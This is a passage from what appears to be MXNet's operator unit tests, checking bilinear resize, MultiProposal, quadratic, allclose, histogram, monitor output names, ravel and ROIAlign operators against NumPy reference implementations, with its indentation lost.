h1lambda = h1r - h1
h0lambda = 1 - h1lambda
#
w1r = rwidth * w2
w1 = int(w1r)
w1p = 1 if (w1 < width1 - 1) else 0
w1lambda = w1r - w1
w0lambda = 1 - w1lambda
#
for n in range(0, batchsize):
for c in range(0, channels):
d2val = data2[n][c][h2][w2]
data1[n][c][h1][w1] += h0lambda * w0lambda * d2val
data1[n][c][h1][w1 + w1p] += h0lambda * w1lambda * d2val
data1[n][c][h1 + h1p][w1] += h1lambda * w0lambda * d2val
data1[n][c][h1 + h1p][w1 + w1p] += h1lambda * w1lambda * d2val
if mode == 'like':
return data1, np.zeros_like(incoming_grads)
return [data1]
def check_bilinear_resize_op(shape, height, width):
x = mx.nd.random.uniform(shape=shape)
y = mx.nd.contrib.BilinearResize2D(x, height=height, width=width)
assert_almost_equal(y, py_bilinear_resize(x.asnumpy(), height, width))
x_scale = width / shape[-1]
y_scale = height / shape[-2]
y = mx.nd.contrib.BilinearResize2D(x, scale_height=y_scale, scale_width=x_scale)
assert_almost_equal(y.asnumpy(), py_bilinear_resize(x.asnumpy(), height, width))
def check_bilinear_resize_align_corners_op():
img_shape = [1, 1, 3, 2]
data = [64, 32, 32, 64, 50, 100]
target_height = 6
target_width = 4
expected_data = {}
# align_corners = False
expected_data[0] = [
64.000, 56.000, 40.000, 32.000, 56.000, 52.000, 44.000, 40.000, 40.000, 44.000, 52.000, 56.000,
36.500, 45.625, 63.875, 73.000, 45.500, 56.875, 79.625, 91.000, 50.000, 62.500, 87.500, 100.000
]
# align_corners = True
expected_data[1] = [
64.000, 53.333, 42.667, 32.000, 51.200, 49.067, 46.933, 44.800, 38.400, 44.800, 51.200, 57.600,
35.600, 47.467, 59.333, 71.200, 42.800, 57.067, 71.333, 85.600, 50.000, 66.667, 83.333, 100.000
]
x = np.array(data, dtype=np.float32).reshape(img_shape)
x_nd = mx.nd.array(x)
y0 = np.array(expected_data[0]).reshape((1, 1, target_height, target_width))
y0_nd = mx.nd.contrib.BilinearResize2D(x_nd, height=target_height, width=target_width, mode='size', align_corners=False)
assert_almost_equal(y0, y0_nd.asnumpy(), atol=1e-3)
y1 = np.array(expected_data[1]).reshape((1, 1, target_height, target_width))
y1_nd = mx.nd.contrib.BilinearResize2D(x_nd, height=target_height, width=target_width, mode='size', align_corners=True)
assert_almost_equal(y1, y1_nd.asnumpy(), atol=1e-3)
def check_bilinear_resize_modes_op(shape, scale_height=None, scale_width=None, shape_1=None, mode=None):
x = mx.nd.random.uniform(shape=shape)
original_h = shape[2]
original_w = shape[3]
if mode == 'odd_scale':
assert scale_height is not None and scale_width is not None
new_h = int(original_h * scale_height) if (original_h % 2) == 0 else \
int((original_h - 1) * scale_height) + 1
new_w = int(original_w * scale_width) if (original_w % 2) == 0 \
else int((original_w - 1) * scale_width) + 1
y = mx.nd.contrib.BilinearResize2D(x, scale_height=scale_height,
scale_width=scale_width,
mode='odd_scale')
elif mode == 'to_even_down':
new_h = original_h if (original_h % 2) == 0 else original_h - 1
new_w = original_w if (original_w % 2) == 0 else original_w - 1
y = mx.nd.contrib.BilinearResize2D(x, mode='to_even_down')
elif mode == 'to_even_up':
new_h = original_h if (original_h % 2) == 0 else original_h + 1
new_w = original_w if (original_w % 2) == 0 else original_w + 1
y = mx.nd.contrib.BilinearResize2D(x, mode='to_even_up')
elif mode == 'to_odd_down':
new_h = original_h if (original_h % 2) == 1 else original_h - 1
new_w = original_w if (original_w % 2) == 1 else original_w - 1
y = mx.nd.contrib.BilinearResize2D(x, mode='to_odd_down')
elif mode == 'to_odd_up':
new_h = original_h if (original_h % 2) == 1 else original_h + 1
new_w = original_w if (original_w % 2) == 1 else original_w + 1
y = mx.nd.contrib.BilinearResize2D(x, mode='to_odd_up')
elif mode == 'like':
x_1 = mx.nd.random.uniform(shape=shape_1)
new_h = x_1.shape[2]
new_w = x_1.shape[3]
y = mx.nd.contrib.BilinearResize2D(x, x_1, mode='like')
new_shape_desired = np.array([shape[0], shape[1], new_h, new_w], dtype='int')
new_shape_got = np.array(y.shape, dtype='int')
data_sym = mx.sym.var('data')
data_np = x.asnumpy()
expected = py_bilinear_resize(data_np, new_h, new_w)
out_grads = np.ones([shape[0], shape[1], new_h, new_w])
expected_backward = py_bilinear_resize_backward(data_np, out_grads, mode)
assert_array_equal(new_shape_desired, new_shape_got, "Desired and got shapes are not equal. {} vs {}".format(
str(new_shape_desired.tolist()), str(new_shape_got.tolist())))
assert_almost_equal(y.asnumpy(), expected, 1e-3, 0)
if mode != 'like':
resize_sym = mx.sym.contrib.BilinearResize2D(data_sym, None, scale_height=scale_height, scale_width=scale_width, mode=mode)
check_symbolic_forward(resize_sym, [data_np], [expected], rtol=1e-3, atol=1e-5)
check_symbolic_backward(resize_sym, [data_np], [out_grads], expected_backward, rtol=1e-3, atol=1e-5)
check_numeric_gradient(resize_sym, [data_np], rtol=1e-2, atol=1e-4)
else:
data_sym_like = mx.sym.var('data_like')
resize_sym = mx.sym.contrib.BilinearResize2D(data_sym, data_sym_like, mode=mode)
date_np_like = x_1.asnumpy()
check_symbolic_forward(resize_sym, [data_np, date_np_like], [expected], rtol=1e-3, atol=1e-5)
check_symbolic_backward(resize_sym, [data_np, date_np_like], [out_grads], expected_backward, rtol=1e-3, atol=1e-5)
check_numeric_gradient(resize_sym, [data_np, date_np_like], rtol=1e-2, atol=1e-4)
shape = (2, 2, 10, 10)
check_bilinear_resize_op(shape, 5, 5)
check_bilinear_resize_op(shape, 10, 10)
check_bilinear_resize_op(shape, 15, 15)
check_bilinear_resize_op(shape, 3, 7)
check_bilinear_resize_op(shape, 13, 17)
shape = (2, 2, 20, 20)
check_bilinear_resize_modes_op(shape, scale_height=0.5, scale_width=0.5, mode='odd_scale')
check_bilinear_resize_modes_op(shape, scale_height=5, scale_width=10, mode='odd_scale')
check_bilinear_resize_modes_op(shape, scale_height=0.1, scale_width=0.2, mode='odd_scale')
check_bilinear_resize_modes_op(shape, mode='to_even_down')
check_bilinear_resize_modes_op(shape, mode='to_even_up')
check_bilinear_resize_modes_op(shape, mode='to_odd_down')
check_bilinear_resize_modes_op(shape, mode='to_odd_up')
shape = (2, 2, 21, 21)
check_bilinear_resize_modes_op(shape, scale_height=0.5, scale_width=0.5, mode='odd_scale')
check_bilinear_resize_modes_op(shape, scale_height=5, scale_width=10, mode='odd_scale')
check_bilinear_resize_modes_op(shape, scale_height=0.1, scale_width=0.2, mode='odd_scale')
check_bilinear_resize_modes_op(shape, mode='to_even_down')
check_bilinear_resize_modes_op(shape, mode='to_even_up')
check_bilinear_resize_modes_op(shape, mode='to_odd_down')
check_bilinear_resize_modes_op(shape, mode='to_odd_up')
shape_0 = (2, 2, 21, 21)
shape_1 = (2, 2, 10, 10)
check_bilinear_resize_modes_op(shape_0, shape_1=shape_1, mode='like')
check_bilinear_resize_modes_op(shape_1, shape_1=shape_0, mode='like')
check_bilinear_resize_align_corners_op()
def test_multi_proposal_op():
# paramters
feature_stride = 16
scales = (8, 16, 32)
ratios = (0.5, 1, 2)
rpn_pre_nms_top_n = 12000
rpn_post_nms_top_n = 2000
threshold = 0.7
rpn_min_size = 16
batch_size = 20
feat_len = (1000 + 15) // 16
H, W = feat_len, feat_len
num_anchors = len(scales) * len(ratios)
count_anchors = H * W * num_anchors
'''
cls_prob: (batch_size, 2 * num_anchors, H, W)
bbox_pred: (batch_size, 4 * num_anchors, H, W)
im_info: (batch_size, 3)
'''
cls_prob = mx.nd.empty((batch_size, 2 * num_anchors, H, W), dtype = np.float32)
bbox_pred = mx.nd.empty((batch_size, 4 * num_anchors, H, W), dtype = np.float32)
im_info = mx.nd.empty((batch_size, 3), dtype = np.float32)
cls_prob = mx.nd.array(np.random.random(cls_prob.shape))
bbox_pred = mx.nd.array(np.random.random(bbox_pred.shape))
for i in range(batch_size):
im_size = np.random.randint(100, feat_len * feature_stride, size = (2,))
im_scale = np.random.randint(70, 100) / 100.0
im_info[i, :] = [im_size[0], im_size[1], im_scale]
def get_sub(arr, i):
new_shape = list(arr.shape)
new_shape[0] = 1
res = arr[i].reshape(new_shape)
return res
def check_forward(rpn_pre_nms_top_n, rpn_post_nms_top_n):
single_proposal = []
single_score = []
for i in range(batch_size):
rois, score = mx.nd.contrib.Proposal(
cls_prob = get_sub(cls_prob, i),
bbox_pred = get_sub(bbox_pred, i),
im_info = get_sub(im_info, i),
feature_stride = feature_stride,
scales = scales,
ratios = ratios,
rpn_pre_nms_top_n = rpn_pre_nms_top_n,
rpn_post_nms_top_n = rpn_post_nms_top_n,
threshold = threshold,
rpn_min_size = rpn_min_size, output_score = True)
single_proposal.append(rois)
single_score.append(score)
multi_proposal, multi_score = mx.nd.contrib.MultiProposal(
cls_prob = cls_prob,
bbox_pred = bbox_pred,
im_info = im_info,
feature_stride = feature_stride,
scales = scales,
ratios = ratios,
rpn_pre_nms_top_n = rpn_pre_nms_top_n,
rpn_post_nms_top_n = rpn_post_nms_top_n,
threshold = threshold,
rpn_min_size = rpn_min_size, output_score = True)
single_proposal = mx.nd.stack(*single_proposal).reshape(multi_proposal.shape)
single_score = mx.nd.stack(*single_score).reshape(multi_score.shape)
single_proposal_np = single_proposal.asnumpy()
multi_proposal_np = multi_proposal.asnumpy()
single_score_np = single_score.asnumpy()
multi_score_np = multi_score.asnumpy()
# check rois x1,y1,x2,y2
assert np.allclose(single_proposal_np[:, 1:], multi_proposal_np[:, 1:])
# check rois batch_idx
for i in range(batch_size):
start = i * rpn_post_nms_top_n
end = start + rpn_post_nms_top_n
assert (multi_proposal_np[start:end, 0] == i).all()
# check score
assert np.allclose(single_score_np, multi_score_np)
def check_backward(rpn_pre_nms_top_n, rpn_post_nms_top_n):
im_info_sym = mx.sym.Variable('im_info')
cls_prob_sym = mx.sym.Variable('cls_prob')
bbox_pred_sym = mx.sym.Variable('bbox_pred')
sym = mx.sym.contrib.MultiProposal(
cls_prob = cls_prob_sym,
bbox_pred = bbox_pred_sym,
im_info = im_info_sym,
feature_stride = feature_stride,
scales = scales,
ratios = ratios,
rpn_pre_nms_top_n = rpn_pre_nms_top_n,
rpn_post_nms_top_n = rpn_post_nms_top_n,
threshold = threshold,
rpn_min_size = rpn_min_size, output_score = False)
location = [cls_prob.asnumpy(), bbox_pred.asnumpy(), im_info.asnumpy()]
expected = [np.zeros_like(e) for e in location]
out_grads = [np.ones((rpn_post_nms_top_n, 5))]
check_symbolic_backward(sym, location, out_grads, expected)
check_forward(rpn_pre_nms_top_n, rpn_post_nms_top_n)
check_forward(rpn_pre_nms_top_n, 1500)
check_forward(1000, 500)
check_backward(rpn_pre_nms_top_n, rpn_post_nms_top_n)
@with_seed()
def test_quadratic_function():
def f(x, a, b, c):
return a * x**2 + b * x + c
a = np.random.random_sample()
b = np.random.random_sample()
c = np.random.random_sample()
data = mx.symbol.Variable('data')
quad_sym = mx.sym.contrib.quadratic(data=data, a=a, b=b, c=c)
for dtype in [np.float16, np.float32, np.float64]:
tol = 1e-2 if dtype is np.float16 else 1e-5
for ndim in range(1, 6):
shape = rand_shape_nd(ndim, 5)
data_np = np.random.randn(*shape).astype(dtype)
expected = f(data_np, a, b, c)
backward_expected = 2 * a * data_np + b
# check imperative forward
output = mx.nd.contrib.quadratic(mx.nd.array(data_np), a=a, b=b, c=c)
assert_almost_equal(output, expected, rtol=tol, atol=tol)
# check forward
check_symbolic_forward(quad_sym, [data_np], [expected], rtol=tol, atol=tol)
# check backward
check_symbolic_backward(quad_sym, [data_np], [np.ones(expected.shape)],
[backward_expected], rtol=tol, atol=tol)
# check backward using finite difference
check_numeric_gradient(quad_sym, [data_np], atol=0.001)
def allclose_function(contexts):
def getRandom(base, percent = 1.):
return base * (1 + percent * (2 * np.random.random_sample() - 1.) / 100)
title = 'exp'
for ctx in contexts:
title += ' cpu' if ctx == mx.cpu() else ' gpu'
title += ' nElem shape'
num_ctx = len(contexts)
result = [False, False]
for dtype in [np.float16, np.float32, np.float64]:
rtol = getRandom(1e-2 if dtype is np.float16 else 1e-5)
atol = getRandom(1e-4 if dtype is np.float16 else 1e-7)
print('\nnumpy.{}: atol = {} rtol = {}'.format(dtype.__name__, atol, rtol))
print(title)
for ndim in range(1, 10):
shape = rand_shape_nd(ndim, 8)
a_np = np.random.randn(*shape).astype(dtype)
b_np = (a_np + np.random.randn(*shape).astype(dtype) / 10000000).astype(dtype)
expected = np.allclose(a_np, b_np, rtol, atol)
for n, ctx in enumerate(contexts):
a_ctx = mx.nd.array(a_np, dtype = dtype, ctx=ctx)
b_ctx = mx.nd.array(b_np, dtype = dtype, ctx=ctx)
output = mx.nd.contrib.allclose(a_ctx, b_ctx, rtol=rtol, atol=atol)
result[n] = output.asnumpy() == 1
if expected != result[n]:
# Preparing the output of elements of the array, which are considered as "not close" AND
# corresponding elements of comparison CPU/GPU/Python vectors, which are considered as "close"
v_ctx = 'CPU' if ctx == mx.cpu() else 'GPU'
if expected:
v_cmp = 'Python'
a_b = a_ctx.asnumpy()
b_b = b_ctx.asnumpy()
a_g = np.asarray(a_np)
b_g = np.asarray(b_np)
else:
v_cmp = v_ctx
v_ctx = 'Python'
a_b = np.asarray(a_np)
b_b = np.asarray(b_np)
a_g = a_ctx.asnumpy()
b_g = b_ctx.asnumpy()
print('\n *** Violations found on %s, but not on %s side ***' % (v_ctx, v_cmp))
frmt = " a[{0:d}]: b[{0:d}]:" \
" abs(a[{0:d}]-b[{0:d}]) - atol + rtol*abs(b[{0:d}]):"
# Define the indices of all violations and corresponding values of coordinates
bad_indexes = np.abs(a_b - b_b) >= atol + rtol * abs(b_b)
a_values = [a_b[bad_indexes], a_g[bad_indexes]]
b_values = [b_b[bad_indexes], b_g[bad_indexes]]
idx = np.asarray(np.where(bad_indexes == True))
idx = idx.reshape(1, idx.size)
idx_flat = np.asarray(np.where(bad_indexes.flatten() == True)).flatten()
for i in range(len(a_values[0])):
flat_idx = idx_flat[i]
print('{}: index = {} flat_index = {}'.format('%4d'%i, idx[i], flat_idx))
print(frmt.format(flat_idx))
for j in range(2):
diff = np.abs(a_values[j][i]-b_values[j][i]) - atol + rtol*abs(b_values[j][i])
print('{}: {} {} {}'.format('%6s'%v_ctx, a_values[j][i], b_values[j][i], diff))
if num_ctx == 1:
print(' {0:d} {1:d} {2:10d} {3:}'.format(expected, result[0], np.prod(shape), shape))
else:
print(' {0:d} {1:d} {2:d} {3:10d} {4:}'.format(expected, result[0], result[1], np.prod(shape), shape))
if expected != result[0] or num_ctx > 1 and expected != result[1]:
assert False
@with_seed()
def test_allclose_function():
allclose_function([default_context()])
@with_seed()
def test_histogram():
def f(x, bins=10, range=None):
return np.histogram(x, bins, range=range)
for ndim in range(1, 6):
shape = rand_shape_nd(ndim)
x = rand_ndarray(shape, stype='default', dtype=np.float64)
mx_bins = mx.nd.array([-1.0, 0.5, 2.0, 4.5, 50.0], dtype=np.float64)
np_bins = mx_bins.asnumpy()
bin_cnt = random.randint(2, 10)
bin_range = (-2.5, 2.5)
mx_histo1, mx_bins1 = mx.nd.histogram(x, bins=bin_cnt, range=bin_range)
np_histo1, np_bins1 = f(x.asnumpy(), bins=bin_cnt, range=bin_range)
assert_almost_equal(mx_bins1, np_bins1)
assert_almost_equal(mx_histo1, np_histo1, rtol=1e-3, atol=1e-5)
mx_histo2, mx_bins2 = mx.nd.histogram(x, bins=mx_bins)
np_histo2, np_bins2 = f(x.asnumpy(), bins=np_bins)
assert_almost_equal(mx_histo2, np_histo2, rtol=1e-3, atol=1e-5)
assert_almost_equal(mx_bins2, np_bins2, rtol=1e-3, atol=1e-5)
data = mx.sym.Variable("data")
bins = mx.sym.Variable("bins")
histo1 = mx.sym.histogram(a=data, bins=bin_cnt, range=bin_range)
histo2 = mx.sym.histogram(a=data, bins=bins)
executor1 = histo1.bind(ctx=default_context(), args={"data" : x})
executor1.forward(is_train=False)
assert_almost_equal(np_histo1, executor1.outputs[0].asnumpy(), 0, 0, ("EXPECTED_histo1", "FORWARD_histo1"), equal_nan=False)
executor2 = histo2.bind(ctx=default_context(), args={"data" : x, "bins" : mx_bins})
executor2.forward(is_train=False)
assert_almost_equal(np_histo2, executor2.outputs[0].asnumpy(), 0, 0, ("EXPECTED_histo2", "FORWARD_histo2"), equal_nan=False)
def test_op_output_names_monitor():
def check_name(op_sym, expected_names):
output_names = []
def get_output_names_callback(name, arr):
output_names.append(py_str(name))
op_exe = op_sym.simple_bind(ctx=mx.current_context(), grad_req='null')
op_exe.set_monitor_callback(get_output_names_callback, monitor_all=False)
try:
op_exe.forward()
mx.nd.waitall()
except mx.base.MXNetError:
# skip errors since test is to check output names
pass
for output_name, expected_name in zip(output_names, expected_names):
assert output_name == expected_name
is_windows = sys.platform.startswith('win')
if (is_windows):
# Windows doesn't support set environment variable on the fly, so disable it for now
pass
else:
# Disable subgraph in case subgraph will replace symbol
os.environ['MXNET_SUBGRAPH_BACKEND'] = "NONE"
data = mx.sym.Variable('data', shape=(10, 3, 10, 10))
conv_sym = mx.sym.Convolution(data, kernel=(2, 2), num_filter=1, name='conv')
check_name(conv_sym, ['conv_output'])
deconv_sym = mx.sym.Deconvolution(data, kernel=(2, 2), num_filter=1, name='deconv')
check_name(deconv_sym, ['deconv_output'])
fc_sym = mx.sym.FullyConnected(data, num_hidden=10, name='fc')
check_name(fc_sym, ['fc_output'])
lrn_sym = mx.sym.LRN(data, nsize=1, name='lrn')
check_name(lrn_sym, ['lrn_output', 'lrn_tmp_norm'])
act_sym = mx.sym.Activation(data, act_type='relu', name='act')
check_name(act_sym, ['act_output'])
cc_sym = mx.sym.concat(data, data, dim=0, name='concat')
check_name(cc_sym, ['concat_output'])
sm_sym = mx.sym.softmax(data, name='softmax')
check_name(sm_sym, ['softmax_output'])
sa_sym = mx.sym.SoftmaxActivation(data, name='softmax')
check_name(sa_sym, ['softmax_output'])
us_sym = mx.sym.UpSampling(data, scale=2, sample_type='nearest',
name='upsampling')
check_name(us_sym, ['upsampling_output'])
us_sym = mx.sym.Pooling(data, kernel=(2, 2), pool_type='avg',
name='pooling')
check_name(us_sym, ['pooling_output'])
del os.environ['MXNET_SUBGRAPH_BACKEND']
def test_op_all_names_monitor():
def check_name(op_sym, expected_names):
output_names = []
def get_output_names_callback(name, arr):
output_names.append(py_str(name))
op_exe = op_sym.simple_bind(ctx=mx.current_context(), grad_req='null')
op_exe.set_monitor_callback(get_output_names_callback, monitor_all=True)
try:
op_exe.forward()
mx.nd.waitall()
except mx.base.MXNetError:
# skip errors since test is to check all names
pass
for output_name, expected_name in zip(output_names, expected_names):
assert output_name == expected_name
is_windows = sys.platform.startswith('win')
if (is_windows):
# Windows doesn't support set environment variable on the fly, so disable it for now
pass
else:
# Disable subgraph in case subgraph will replace symbol
os.environ['MXNET_SUBGRAPH_BACKEND'] = "NONE"
data = mx.sym.Variable('data', shape=(10, 3, 10, 10))
conv_sym = mx.sym.Convolution(data, kernel=(2, 2), num_filter=1, name='conv')
check_name(conv_sym, ['data', 'conv_data', 'conv_weight', 'conv_weight', 'conv_bias', 'conv_bias', 'conv_output'])
deconv_sym = mx.sym.Deconvolution(data, kernel=(2, 2), num_filter=1, name='deconv')
check_name(deconv_sym, ['data', 'deconv_data', 'deconv_weight', 'deconv_weight', 'deconv_output'])
fc_sym = mx.sym.FullyConnected(data, num_hidden=10, name='fc')
check_name(fc_sym, ['data', 'fc_data', 'fc_weight', 'fc_weight', 'fc_bias', 'fc_bias', 'fc_output'])
lrn_sym = mx.sym.LRN(data, nsize=1, name='lrn')
check_name(lrn_sym, ['data', 'lrn_data', 'lrn_output', 'lrn_tmp_norm'])
act_sym = mx.sym.Activation(data, act_type='relu', name='act')
check_name(act_sym, ['data', 'act_input0', 'act_output'])
cc_sym = mx.sym.concat(data, data, dim=0, name='concat')
check_name(cc_sym, ['data', 'concat_arg0', 'data', 'concat_arg1', 'concat_output'])
sm_sym = mx.sym.softmax(data, name='softmax')
check_name(sm_sym, ['data', 'softmax_data', 'softmax_output'])
length = mx.sym.Variable("length", shape=(10, 10, 10))
sm_sym = mx.sym.softmax(data, length, axis=1, use_length=True, name='softmax')
check_name(sm_sym, ['data', 'softmax_data', 'length', 'softmax_length', 'softmax_output'])
sa_sym = mx.sym.SoftmaxActivation(data, name='softmax')
check_name(sa_sym, ['data', 'softmax_input0', 'softmax_output'])
us_sym = mx.sym.UpSampling(data, scale=2, sample_type='nearest',
name='upsampling')
check_name(us_sym, ['data', 'upsampling_arg0', 'upsampling_output'])
us_sym = mx.sym.Pooling(data, kernel=(2, 2), pool_type='avg',
name='pooling')
check_name(us_sym, ['data', 'pooling_data', 'pooling_output'])
del os.environ['MXNET_SUBGRAPH_BACKEND']
@with_seed()
@unittest.skip("test fails intermittently. temporarily disabled till it gets fixed. tracked at https://github.com/apache/incubator-mxnet/issues/13915")
def test_activation():
shapes = [(9,), (9, 10), (9, 10, 10), (1, 9, 10, 10)]
dtype_l = [np.float64, np.float32, np.float16]
rtol_l = [1e-7, 1e-6, 1e-2]
atol_l = [1e-7, 1e-6, 1e-2]
rtol_fd = 1e-5
atol_fd = 1e-6
num_eps = 1e-6
unary_ops = {
'relu': [lambda x: mx.sym.Activation(x, act_type='relu'),
lambda x: np.maximum(x, 0.),
lambda x: 1. * (x > 0.),
-5.0, 5.0],
'sigmoid': [lambda x: mx.sym.Activation(x, act_type='sigmoid'),
lambda x: 1. / (np.exp(-x) + 1.),
lambda x: 1. / (np.exp(-x) + 1.) / (np.exp(x) + 1.),
-3.0, 3.0],
'tanh': [lambda x: mx.sym.Activation(x, act_type='tanh'),
lambda x: np.tanh(x),
lambda x: 1. - np.tanh(x) ** 2,
-4.0, 4.0],
'softrelu': [lambda x: mx.sym.Activation(x, act_type='softrelu'),
lambda x: np.log(1. + np.exp(x)),
lambda x: 1. - 1 / (1 + np.exp(x)),
-3.0, 3.0],
'softsign': [lambda x: mx.sym.Activation(x, act_type='softsign'),
lambda x: x / (1. + np.abs(x)),
lambda x: 1. / np.square(1. + np.abs(x)),
-3.0, 3.0],
}
# Loop over operators
for name, op in unary_ops.items():
# Loop over shapes
for shape in shapes:
# Loop over dtype's
for ind in range(len(dtype_l)):
dtype = dtype_l[ind]
rtol = rtol_l[ind]
atol = atol_l[ind]
compare_forw_backw_unary_op(
name, op[0], op[1], op[2], shape, op[3], op[4], rtol, atol,
dtype)
# Finite difference testing
finite_diff_unary_op(
name, op[0], shape, op[3], op[4], rtol_fd, atol_fd, num_eps)
@with_seed()
def test_ravel():
# be aware that check_symbolic_forward will use float type internally
# for the arrays and that limits the representable flat index range.
# Taking dim==4 and a range of [0,..,100] for the data can already
# cause precision issues and break this test.
for dim in [1, 2, 3, 4]:
data = np.random.randint(50, size=(dim, 500))
shape = tuple(np.add(np.amax(data, axis=1), [1]))
a = mx.sym.Variable('a')
ravel_npy = np.ravel_multi_index(data, shape)
b = mx.sym.ravel_multi_index(a, shape=shape)
check_symbolic_forward(b, location={'a': data}, expected=[ravel_npy])
c = mx.sym.unravel_index(a, shape=shape)
check_symbolic_forward(c, location={'a': ravel_npy}, expected=[data])
# Test with leading dimension set to -1.
shape2 = shape
shape2 = (-1,)+shape[1:]
b = mx.sym.ravel_multi_index(a, shape=shape2)
check_symbolic_forward(b, location={'a': data}, expected=[ravel_npy])
c = mx.sym.unravel_index(a, shape=shape2)
check_symbolic_forward(c, location={'a': ravel_npy}, expected=[data])
def test_context_num_gpus():
try:
# Note: the test is run both on GPU and CPU hosts, so that we can not assert
# on a specific number here.
assert mx.context.num_gpus() >= 0
except mx.MXNetError as e:
# Note: On a CPU only host CUDA sometimes is not able to determine the number
# of GPUs
if str(e).find("CUDA") == -1:
raise e
@with_seed()
def test_op_roi_align():
T = np.float32
def assert_same_dtype(dtype_a, dtype_b):
'''
Assert whether the two data type are the same
Parameters
----------
dtype_a, dtype_b: type
Input data types to compare
'''
assert dtype_a == dtype_b,\
TypeError('Unmatched data types: %s vs %s' % (dtype_a, dtype_b))
def bilinear_interpolate(bottom, height, width, y, x):
if y < -1.0 or y > height or x < -1.0 or x > width:
return T(0.0), []
x = T(max(0.0, x))
y = T(max(0.0, y))
x_low = int(x)
y_low = int(y)
if x_low >= width - 1:
x_low = x_high = width - 1
x = T(x_low)
else:
x_high = x_low + 1
if y_low >= height - 1:
y_low = y_high = height - 1
y = T(y_low)
else:
y_high = y_low + 1
ly = y - T(y_low)
lx = x - T(x_low)
hy = T(1.0) - ly
hx = T(1.0) - lx
v1 = bottom[y_low, x_low]
v2 = bottom[y_low, x_high]
v3 = bottom[y_high, x_low]
v4 = bottom[y_high, x_high]
w1 = hy * hx
w2 = hy * lx
w3 = ly * hx
w4 = ly * lx
assert_same_dtype(w1.dtype, T)
assert_same_dtype(w2.dtype, T)
assert_same_dtype(w3.dtype, T)
assert_same_dtype(w4.dtype, T)
val = w1 * v1 + w2 * v2 + w3 * v3 + w4 * v4
assert_same_dtype(val.dtype, T)
grad = [(y_low, x_low, w1), (y_low, x_high, w2),
(y_high, x_low, w3), (y_high, x_high, w4)
]
return val, grad
def roialign_forward_backward(data, rois, pooled_size, spatial_scale, sampling_ratio,
position_sensitive, dy):
N, C, H, W = data.shape
R = rois.shape[0]
PH, PW = pooled_size
assert rois.ndim == 2,\
ValueError(
'The ndim of rois should be 2 rather than %d' % rois.ndim)
assert rois.shape[1] == 5,\
ValueError(
'The length of the axis 1 of rois should be 5 rather than %d' % rois.shape[1])
assert_same_dtype(data.dtype, T)
assert_same_dtype(rois.dtype, T)
C_out = C // PH // PW if position_sensitive else C
out = np.zeros((R, C_out, PH, PW), dtype=T)
dx = np.zeros_like(data)
drois = np.zeros_like(rois)
for r in range(R):
batch_ind = int(rois[r, 0])
sw, sh, ew, eh = rois[r, 1:5] * T(spatial_scale)
roi_w = T(max(ew - sw, 1.0))
roi_h = T(max(eh - sh, 1.0))
bin_h = roi_h / T(PH)
bin_w = roi_w / T(PW)
bdata = data[batch_ind]
if sampling_ratio > 0:
roi_bin_grid_h = roi_bin_grid_w = sampling_ratio
else:
roi_bin_grid_h = int(np.ceil(roi_h / T(PH)))
roi_bin_grid_w = int(np.ceil(roi_w / T(PW)))
count = T(roi_bin_grid_h * roi_bin_grid_w)
for c in range(C_out):
for ph in range(PH):
for pw in range(PW):
val = T(0.0)
c_in = c * PH * PW + ph * PW + pw if position_sensitive else c
for iy in range(roi_bin_grid_h):
y = sh + T(ph) * bin_h + (T(iy) + T(0.5)) * \
bin_h / T(roi_bin_grid_h)
for ix in range(roi_bin_grid_w):
x = sw + T(pw) * bin_w + (T(ix) + T(0.5)) * \
bin_w / T(roi_bin_grid_w)
v, g = bilinear_interpolate(
bdata[c_in], H, W, y, x)
assert_same_dtype(v.dtype, T)
val += v
# compute grad
for qy, qx, qw in g:
assert_same_dtype(qw.dtype, T)
dx[batch_ind, c_in, qy, qx] += dy[r,
c, ph, pw] * qw / count
out[r, c, ph, pw] = val / count
assert_same_dtype(out.dtype, T)
return out, [dx, drois]
def test_roi_align_value(sampling_ratio=0, position_sensitive=False):
ctx = default_context()
dtype = np.float32
dlen = 224
N, C, H, W = 5, 3, 16, 16
R = 7
pooled_size = (3, 4)
C = C * pooled_size[0] * pooled_size[1] if position_sensitive else C
spatial_scale = H * 1.0 / dlen
data = mx.nd.array(
np.arange(N * C * W * H).reshape((N, C, H, W)), ctx=ctx, dtype=dtype)
center_xy = mx.nd.random.uniform(0, dlen, (R, 2), ctx=ctx, dtype=dtype)
wh = mx.nd.random.uniform(0, dlen, (R, 2), ctx=ctx, dtype=dtype)
batch_ind = mx.nd.array(np.random.randint(0, N, size=(R, 1)), ctx=ctx)
pos = mx.nd.concat(center_xy - wh / 2, center_xy + wh / 2, dim=1)
rois = mx.nd.concat(batch_ind, pos, dim=1)
data.attach_grad()
rois.attach_grad()
with mx.autograd.record():
output = mx.nd.contrib.ROIAlign(data, rois, pooled_size=pooled_size,
spatial_scale=spatial_scale, sample_ratio=sampling_ratio,
position_sensitive=position_sensitive)
C_out = C // pooled_size[0] // pooled_size[1] if position_sensitive else C
dy = mx.nd.random.uniform(-1, 1, (R, C_out) +
pooled_size, ctx=ctx, dtype=dtype)
output.backward(dy)
real_output, [dx, drois] = roialign_forward_backward(data.asnumpy(), rois.asnumpy(), pooled_size,
spatial_scale, sampling_ratio,
position_sensitive, dy.asnumpy())
assert_almost_equal(output, real_output, atol=1e-3)
assert_almost_equal(data.grad, dx, atol=1e-3)
assert_almost_equal(rois.grad, drois, atol=1e-3)
# modified from test_roipooling()
def test_roi_align_autograd(sampling_ratio=0):
ctx = default_context()
data = mx.symbol.Variable(name='data')
rois = mx.symbol.Variable(name='rois')
test = mx.symbol.contrib.ROIAlign(data=data, rois=rois, pooled_size=(4, 4), spatial_scale=1,
sample_ratio=sampling_ratio)
x1 = np.random.rand(4, 1, 12, 12).astype('float64')
x2 = np.array([[0, 1.1, 1.1, 6.2, 6.2], [2, 6.1, 2.1, 8.2, 11.2],
[1, 3.1, 1.1, 5.2, 10.2]], dtype='float64')
check_numeric_gradient(sym=test, location=[x1, x2],
grad_nodes={'data': 'write', 'rois': 'null'},
numeric_eps=1e-4, rtol=1e-1, atol=1e-4, ctx=ctx)
check_numeric_gradient(sym=test, location=[x1, x2],
grad_nodes={'data': 'add', 'rois': 'null'},
numeric_eps=1e-4, rtol=1e-1, atol=1e-4, ctx=ctx)
test_roi_align_value()
test_roi_align_value(sampling_ratio=2)
test_roi_align_value(position_sensitive=True)
test_roi_align_autograd()
@with_seed()
def test_op_rroi_align():
T = np.float32
def assert_same_dtype(dtype_a, dtype_b):
'''
Assert whether the two data type are the same
Parameters
----------
dtype_a, dtype_b: type
Input data types to compare
'''
assert dtype_a == dtype_b,\
TypeError('Unmatched data types: %s vs %s' % (dtype_a, dtype_b))
